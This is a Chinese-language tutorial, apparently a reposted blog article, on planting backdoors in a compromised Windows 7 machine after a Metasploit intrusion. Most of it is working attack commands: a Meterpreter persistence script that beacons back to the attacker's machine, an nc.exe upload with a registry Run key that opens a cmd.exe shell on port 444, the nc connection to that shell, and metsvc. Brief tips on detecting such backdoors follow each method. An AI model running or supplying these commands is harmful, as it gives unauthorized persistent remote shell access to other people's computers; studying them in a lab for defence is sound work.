Windows攻防实战之后门

Windows攻防实战之后门

首页角色扮演无情剑客更新时间:2024-06-23

声明:谢绝一切形式的转载,禁止用作非法目的

当通过木马或者漏洞成功入侵别人电脑后,由于MSF发起的攻击都是基于内存的,因此,当被入侵的电脑关机之后或者漏洞修复之后,前期建立的连接就都不复存在了。所以,有必要在被入侵的电脑上安装后门,让"肉鸡"每次重启之后,都能和自己的机器自动建立连接。

准备条件

"肉鸡": Windows7 32位 防火墙开启

通过木马建立连接

具体内容可参考这里

Persistence 后门建立后门

通过下面的帮助信息,可以看出persitence模块是用来在目标机器上创建后门的脚本。比较常用的参数-A 、-X、-I、-p、-r,具体含义可查看帮助。

meterpreter > run persistence -h[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.[!] Example: run exploit/windows/local/persistence OPTION=value [...]Meterpreter Script for creating a persistent backdoor on a target host.OPTIONS: -A Automatically start a matching exploit/multi/handler to connect to the agent -L <opt> Location in target host to write payload to, if none %TEMP% will be used. -P <opt> Payload to use, default is windows/meterpreter/reverse_tcp. -S Automatically start the agent on boot as a service (with SYSTEM privileges) -T <opt> Alternate executable template to use -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i <opt> The interval in seconds between each connection attempt -p <opt> The port on which the system running Metasploit is listening -r <opt> The IP of the system running Metasploit listening for the connect back

建立一个后门,每隔5s尝试建立连接,自动匹配模块exploit/multi/handler连接黑客的机器。

run persistence -A -X -i 5 -p 9988 -r 192.168.42.49

运行命令之后,可以看出生成了一个vbs脚本。Persistence 后门基于的就是这个脚本。

*死9988端口对应的会话。

sessions -k 5

过一会,发现9988端口的会话又建立起来了。

将"肉鸡"重启,查看9988端口的会话是否会被重新建立。

从图中可以看出,重启之后,会话又被成功建立起来了。

检测后门

(1)查看相应的目录是否有可疑的vbs。 (2)查看可疑端口 (3)查看可疑的开机启动项

nc后门建立nc后门

nc.exe具有"瑞士军刀"的美名,其在反向连接方面的功能可以用强大甚至恐怖来形容。

上传nc后门到"肉鸡"

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

枚举注册表内容(开机启动),注册表相关的内容在前面有介绍。

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

在该注册表增加内容(开机启动)

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe"

查看内容

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

具体过程如下:

重启"肉鸡",通过nc连接

nc 192.168.42.40 444

成功连接后,能够获得肉鸡的cmd终端:

检测nc后门
  1. 通过主注册表的开机启动项目进行检测。
  2. 通过nc程序名字进行检测,这个很容易绕过,改成具有迷惑行为的名字就可以
  3. 可疑端口检测
metsvc后门

使用如下命令

run metsvc

然后重启之后,通过bind_tcp进行主动连接。 由于版本问题,在win7 32位上,相应的服务起不来,不做过多介绍。

写在最后

后门植入,是进行持续性攻击的有效手段。其基本原理大都是基于开启启动项,大多数都是通过注册表实现的,因此,开机启动项要认真辨别,否则,你的机器可能就是一台"肉鸡"。

公众号

相应的视频,后续会更新。更多内容,欢迎关注我的微信公众号:无情剑客。

查看全文
大家还看了
也许喜欢
更多游戏

Copyright © 2024 妖气游戏网 www.17u1u.com All Rights Reserved